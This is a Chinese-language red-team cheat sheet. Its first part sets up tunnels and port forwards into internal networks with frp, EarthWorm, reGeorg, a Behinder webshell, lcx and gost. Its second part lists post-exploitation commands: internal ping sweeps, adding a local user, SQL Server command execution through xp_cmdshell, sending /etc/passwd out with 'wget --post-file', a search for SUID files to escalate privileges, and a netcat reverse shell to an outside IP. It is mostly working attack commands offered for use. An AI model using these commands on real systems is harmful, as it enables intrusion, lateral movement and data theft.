一、Tools
0、工具下载地址
frp:https://diannaobos.com/frp/
proxifier:https://proxifier.soft32.com/
EarthWorm,停止更新-在commit中下载:https://github.com/rootkiter/Binary-files
冰蝎:https://github.com/rebeyond/Behinder/releases
reGeorg:https://github.com/sensepost/reGeorg
lcx下载:https://github.com/UndefinedIdentifier/LCX
gost下载:https://github.com/ginuerzh/gost
1、 frp 无域名 需要vps web-端口转发 测试成功
frpc.ini/跳板
1 | [common] |
frps.ini/公网服务器
1 | [common] |
2、frp 有域名 需要vps web-端口转发 测试成功
frpc.ini/跳板
1 | [common] |
frps.ini/公网服务器
1 | [common] |
3、frp+proxifier 需要vps socks 测试成功
frpc.ini/跳板
1 | [common] |
frps.ini/公网服务器
1 | [common] |
4、ew+proxifier 需要vps socks 测试成功
公网服务器:
1 | ew_win32.exe -s rcsocks -l 9999 -e 8888 |
跳板:
1 | ew_win32.exe -s rssocks -d 192.168.8.98 -e 8888 |
5、reGeorg+proxifier 无需vps 测试失败
本机
1 | reGeorgSocksProxy.py -p 9999 -u http://{{跳板ip}}/tunnel.nosocket.php |
跳板
1 | 上传tunnel.nosocket.php即可 |
6、冰蝎+proxifier 无需vps 测试失败
冰蝎传马-socks转发-使用proxifier本地10086代理即可
7、lcx-端口转发 win10 需要vps 测试成功
192.168.59.133 81为内网服务
跳板
1 | Lcx.exe -slave 192.168.8.98 8888 192.168.59.133 81 |
公网服务器
1 | Lcx.exe -listen 8888 9999 |
访问公网服务器9999
8、gost
gost1
./gost-darwin-amd64-2.11.1 -L rtcp://:8888/localhost:8888 -F forward+ssh://admin:123456@vpsip:2222?ping=60
VPS
./gost-linux-amd64-2.11.1 -L forward+ssh://admin:123456@:2222
进行socks5代理
gost2
VICTIM
./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@121.40.49.4:9898?ping=60
VPS
./gost2.11.2 -L forward+ssh://admin:123456@:9898
socks5为vps:8888
gost3
victim
1 | ./gost2.11.2 -L=socks5://:7777 |
VPS:
./gost2.11.2 -L forward+ssh://admin:123456@:9898
gost 端口转发
TCP 转发
1 | gost -L=tcp://:本地使用端口/远程服务IP:远程服务端口 |
UDP 转发
1 | gost -L=udp://:本地使用端口/远程服务IP:远程服务端口 |
全协议转发(TCP+UDP)
1 | gost -L=:本地使用端口/远程服务IP:远程服务端口 |
二、Command
ps:
ping 探测内网机器存活
for /l %i in (1,1,255) do ping -n 1 -w 60 192.168.1.%i | find "TTL"
linux内网
bashcode
1 |
|
run:for i in $(seq 1 255); do bash scan.sh 10.10.$i.0-255;sleep 1;cat chip.txt;done
code
1 |
|
run
1 | bash 123.sh 10.10.1 |
phpmyadmin
1 | SHOW VARIABLES LIKE '%general%' |
新增用户
1 | net user test test /add |
sqlserver rce
1 | exec master..xp_cmdshell "whoami" |
docker
docker中 启动所有的容器命令
1 | docker start $(docker ps -a | awk '{ print $1}' | tail -n +2) |
读文件
1 | wget --post-file=/etc/passwd xxxx |
suid提权
1 | find / -user root -perm -4000 -print 2>/dev/null |
压缩
1 | find ./ -type f -name '*.php' | xargs tar -zcvf /tmp/t.tar.gz |
反弹shell
1 | netcat 47.xxx.xxx.72 2333 -e /bin/bash |